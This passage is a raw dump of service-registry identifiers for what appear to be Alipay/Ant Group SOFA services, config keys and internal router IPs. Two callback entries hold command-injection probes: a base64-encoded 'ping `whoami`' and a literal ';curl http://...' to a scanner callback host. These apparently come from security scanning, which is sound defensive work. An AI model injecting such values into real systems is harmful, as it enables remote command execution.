NCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.integration.afts.AftsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:artvcroom@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:ideploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:comfirmCompletePreCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.BillDownloadResource.sendDetailSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.management.aegis.AegisInfoMngFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.biz.shared.SystemConfig.debugLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhcprod.core.repository.UserCollectionActivityRecordRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.label.MemberLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:jianjia_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.staff.StaffQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.etetestcore.service.api.sharepeerpay.SharePeerPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.workBenchStarWishMultiContentDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.query.RegularOpenBondQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-mrchorder-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.cif.client.drm.AntPassportSwitcher.antPassportMaster,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebplus.common.facade.service.api.query.YebsContractQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.StarWishUnitedDrm.retryFixedFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketcore.common.service.facade.CommonQuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SecumngNewsItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:voucherCoreTemplateCopyTaskCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.33.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.biz.service.impl.drm.CacheTrigger.bundleCacheName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bizfundprod.biz.payment.v2.transfer.api.IRemoteTransferOrderService:1.0:remoteTransferOrderService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.pcald.common.service.facade.AssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.antchain.myentcore.common.service.facade.api.UserAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.112.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:creditutcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_ITECHRISK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.iglobalfundcontrol.facade.api.IntercompanyFundAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.FinTntOutfluxQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomerweb.common.service.facade.AuthCodeManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.178.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorTransmitResource.upEventConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.payment.common.api.AssetConsultService:1.0:pointcoreAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:cGluZyBgd2hvYW1pYDMzMDI0ODY5LS0xMDQwMDMwMjguYW50c2Nhbm5lci5nbG9iYWwuYWxpcGF5LmNvbQ==@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.user.CustomUserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.signup.ClvUserGraylistService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkibcapitalmng_processCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfmreceipt.service.facade.api.BankT05FinanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.infosec:name=com.alipay.infosec.biz.manager.drm.ChangeOrderDRMResource.outerPlatformUniqueId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:resmng-monitorRulePMCCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.tntInst.TntInstMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.134.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:spm-app#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:securitycds_sync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.ChannelBatchQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.video.AccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.UserActivityAssetQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.FinacCollecDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:insttrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaybuserviceAuthTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acpmpcore.common.service.facade.TagInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payment.common.api.AssetConsultService:1.0:aeicoreAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.219.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.FengdieControlConfig.uedReviewerWithProductStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frastress.common.service.facade.api.riskserve.RiskServeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.facade.reachshop.ShopRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.query.api.AccRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.136.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshysop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opensupport.common.service.facade.resourcemapper.OstsResourceMapperFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangePlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloanweb.facade.ContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.activity.ActivityForumAndAgendaFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.acctransquery.common.service.facade.api.FinAccountInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundMerchantWithdrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:pickup#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alipaymember.common.service.facade.family.service.FamilyPointCertFamilyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.datasync.NewsDataSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.staff.common.service.facade.GeneralCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.demo.SampleTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxcore.common.service.facade.api.tag.TagMngQueryNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsapiDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.180.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilelbs.common.service.facade.ip.IpLocateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.173.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finbatchTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditmarket.mission.receive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.backend.OpusReviseIntoContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";curl http://86842598-80102053-uniqueId-104003027.antscanner.global.alipay.com;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aqe.cushion.facade.CloudCatalogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.config.UserValidateConfigDrm.userIdWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.instFlowControlJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","_CLIENTSERVICE_TEST_6_1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchasset.common.service.facade.common.AssetRolePermissionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.RefreshCacheService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.insmarketingapp.InsMktProdAppPrizeExchangeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.area.InstServiceAreaOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.fc.process.bp.engine.job.drm.JobDrmAdapter.multiMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:memberprodAppealCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.testOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodtrans.senior.record.facade.ProdtransSyncRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pcardsales:name=com.alipay.pcardsales.integration.drm.WaterLevelResource.investorsWaterLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:ccrprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfintertrade.common.service.facade.callback.InterTradeApprovalCallback:1.0:investmentPlatform_InterTradeApprovalCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.goldetfprod.common.service.facade.api.GoldBillManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.product.ProdAttrManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.settlequery.common.service.facade.withdraw.api.WithdrawQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.126.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservindustryprod.common.service.facade.tmall.TmallShopSyncInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.MerchantShopQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PublicCustomExtensionInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antiep.biz.rpc.AntiepWebRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mrchmobile#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alipassprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.test.demo.SampleService:1.0:B1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasset.common.service.facade.stuff.api.StuffCheckQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.refreshCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.shop.card.ShopCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:unitradeprod_rzone_rzone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.bizroute.BusinessMetaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.biz.PointBizConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:trigger-auto-orderlink-migrate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.api.UserIdentifyService:1.0:gwService@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipaycore.common.service.facade.query.api.DepositCancelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.apcontainersrv.common.service.facade.linke.LinkEAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.fininfo.biz.service.impl.drm.TransactionDRM.tntInstIdCodeDRM,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.access.CategoryServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.76.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.openeco.coc.ecomodel.api.search.GeneralSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.settlequery.common.service.facade.config.api.InstChannelQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sandboxhome:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.flab.facade.api.business.FlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.241.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@ordercore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.csbizcenter.facade.CityServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mordercenter.MocKbOrderPayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.sdlib.namelist.StrategyBlackListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipayse.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsMftransQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insxhbclaimprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:meshyoptprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.ElasticDBSourceMsgSubParamsDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.conflictrule.ArConflictRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_account_manage@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@cloudeventing#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.rest.restful.ConnectionService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.recon.common.service.facade.fund.api.ApplyUnconfirmTransVoucherService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.facade.consumecenter.ConsumerRecordDetailsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsupport.common.service.facade.serial.SerialNoTransformService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.fc.common.util.LogManagerTrigger.bufferInstruction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MRCHSERVBASE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepTaskBizFacade:1.0:antforest-reborn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.ftg.service.FtgQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.163.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iamlmatrix.common.service.facade.RscPendingServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.GrayDRM.openGray,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.workflow.WorkflowCommonReplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.FundRiskModelingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:servicegoverncenterMAIN_SITE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITCHECK#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:dayutrprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.download.api.ErcBillQueryDownLoadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finatp.common.service.facade.testcase.TestCaseInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.72.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapitool.facade.api.FieldControlQueryFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.smartDeductSkipDay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.infosec.content.service.facade.IPictureCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityAuditAuthorityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.api.AccurateService:1.0:csaccurate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CreditToolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.api.budget.BudgetInputFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceAsyncCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkbudgetcore.facade.PlanBudgetManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.tradepush.prodmsg.ProductLifecycleMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.87.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebppcore.facade.CloseBillFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CategoryVideoFrameListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.QuotationHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaybuserviceAuthTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.chips.api.ChiptransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-Mcenter-DataSync#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.budgetcore.common.service.facade.query.BudgetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.oil.AutoMktOilCertifyFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.recon.ReconRecoveryStatisticsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.171#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dmeta.facade.virtualcanvas.DmetaVirtualCanvasEntityWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductSearchQueryStdFacade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:finsmarttwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:memberprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.api.UnifiedDistributionPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.done.common.service.facade.v1.service.DoneIntegrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PRODTRANS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unirelease.common.service.facade.UniReleaseCheckFacade:1.0:zpaas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageConsumeService:1.0:familycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmeteragecore.common.service.facade.TaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.ruleengine.service.ReGreyListSyncServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.FengdieControlConfig.fengdieAppId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.232.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydatastudio:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@